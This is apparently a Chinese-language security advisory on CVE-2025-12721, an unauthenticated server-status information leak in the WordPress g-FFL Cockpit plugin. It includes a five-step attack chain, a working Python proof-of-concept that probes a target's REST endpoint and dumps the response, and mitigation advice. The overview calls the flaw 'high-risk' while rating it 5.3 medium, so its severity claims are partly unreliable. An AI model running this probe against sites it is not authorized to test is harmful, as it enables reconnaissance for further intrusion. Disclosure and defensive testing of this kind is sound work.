CVE-2025-12721: WordPress g-FFL Cockpit插件/server_status端点敏感信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-12721

漏洞类型

敏感信息泄露

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

WordPress g-FFL Cockpit plugin

漏洞概述

CVE-2025-12721是WordPress平台g-FFL Cockpit插件中的一个高危安全漏洞。该插件主要用于WordPress网站的服务器状态监控和管理功能。漏洞存在于插件提供的/server_status REST API端点，由于开发人员在实现该接口时缺少适当的权限验证和访问控制机制，导致任何未经身份验证的用户都可以直接访问该端点并获取服务器敏感信息。攻击者无需任何凭据即可利用此漏洞，通过发送简单的HTTP请求即可获取目标服务器的系统配置、服务器状态、环境变量等敏感数据。这些信息可能被用于进一步的攻击活动，如环境探测、漏洞利用链构建或针对特定服务器配置的攻击。该漏洞影响插件1.7.1及以下所有版本，CVSS评分为5.3，属于中等严重程度。由于WordPress生态系统中该插件被广泛使用，漏洞影响面较大，建议用户尽快升级到最新版本或采取临时缓解措施。

技术细节

该漏洞的根本原因在于g-FFL Cockpit插件的REST API端点实现中缺少WordPress capability检查机制。在WordPress插件开发中，涉及敏感操作的REST API端点通常需要使用current_user_can()函数进行权限验证，确保只有具有相应权限的用户才能访问。然而，该插件的/server_status端点在注册时未设置权限回调函数（permission_callback），导致所有用户（包括未登录的访客）都可以访问该端点。技术实现上，该端点对应文件为includes/class-sync-endpoint.php第1385行附近的代码，负责返回服务器状态信息。攻击者可以通过发送GET请求到wp-json/g-ffl-cockpit/v1/server_status端点来触发漏洞，返回的响应可能包含：服务器操作系统信息、Web服务器类型、PHP版本、数据库连接信息、网站目录结构等敏感配置数据。攻击者利用这些信息可以进一步了解目标环境，为后续攻击做准备，如寻找其他已知漏洞或配置弱点进行组合攻击。

攻击链分析

STEP 1

步骤1

攻击者识别目标WordPress网站，并检查是否安装并启用了g-FFL Cockpit插件

STEP 2

步骤2

攻击者构造针对/wp-json/g-ffl-cockpit/v1/server_status端点的HTTP GET请求，无需携带任何认证信息

STEP 3

步骤3

目标服务器由于缺少权限检查，直接返回服务器状态信息，包括系统配置、环境变量、数据库连接信息等敏感数据

STEP 4

步骤4

攻击者收集并分析获取的服务器信息，用于环境探测和了解目标系统的具体配置

STEP 5

步骤5

利用收集到的信息，结合其他已知漏洞或配置弱点，构建进一步的攻击链，如获取更高权限或执行恶意代码

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-12721 PoC - Unauthenticated Server Status Information Disclosure
# Affected: WordPress g-FFL Cockpit Plugin <= 1.7.1

import requests
import sys
import json

def check_vulnerability(target_url):
    """
    Check if the target WordPress site is vulnerable to CVE-2025-12721
    """
    # Construct the vulnerable REST API endpoint
    endpoint = target_url.rstrip('/') + '/wp-json/g-ffl-cockpit/v1/server_status'
    
    print(f"[*] Testing target: {target_url}")
    print(f"[*] Endpoint: {endpoint}")
    print("-" * 60)
    
    try:
        # Send unauthenticated GET request to the vulnerable endpoint
        headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36',
            'Content-Type': 'application/json'
        }
        
        response = requests.get(endpoint, headers=headers, timeout=10, verify=False)
        
        print(f"[*] Status Code: {response.status_code}")
        
        if response.status_code == 200:
            try:
                data = response.json()
                print("[!] VULNERABLE - Server status information exposed!")
                print("\n[+] Exposed Information:")
                print(json.dumps(data, indent=2, ensure_ascii=False))
                return True
            except json.JSONDecodeError:
                print("[!] VULNERABLE - Endpoint accessible, but response is not JSON")
                print(f"Response preview: {response.text[:500]}")
                return True
        elif response.status_code == 401 or response.status_code == 403:
            print("[-] NOT VULNERABLE - Endpoint requires authentication")
            return False
        else:
            print(f"[-] Unexpected response: {response.status_code}")
            return False
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")
        return False

def main():
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-12721.py <target_url>")
        print("Example: python cve-2025-12721.py https://example.com")
        sys.exit(1)
    
    target = sys.argv[1]
    check_vulnerability(target)

if __name__ == "__main__":
    main()

影响范围

g-FFL Cockpit plugin <= 1.7.1

防御指南

临时缓解措施

在官方补丁发布之前，可以通过以下方式临时缓解：1) 使用WordPress防火墙规则阻止对/g-ffl-cockpit/v1/server_status端点的访问；2) 通过.htaccess或Nginx配置限制对wp-json路径的外部访问；3) 临时禁用g-FFL Cockpit插件直到有安全更新可用；4) 使用Web应用防火墙(WAF)设置规则防止对REST API端点的探测扫描。建议优先考虑方案1或2，在不影响业务功能的前提下阻止未授权访问。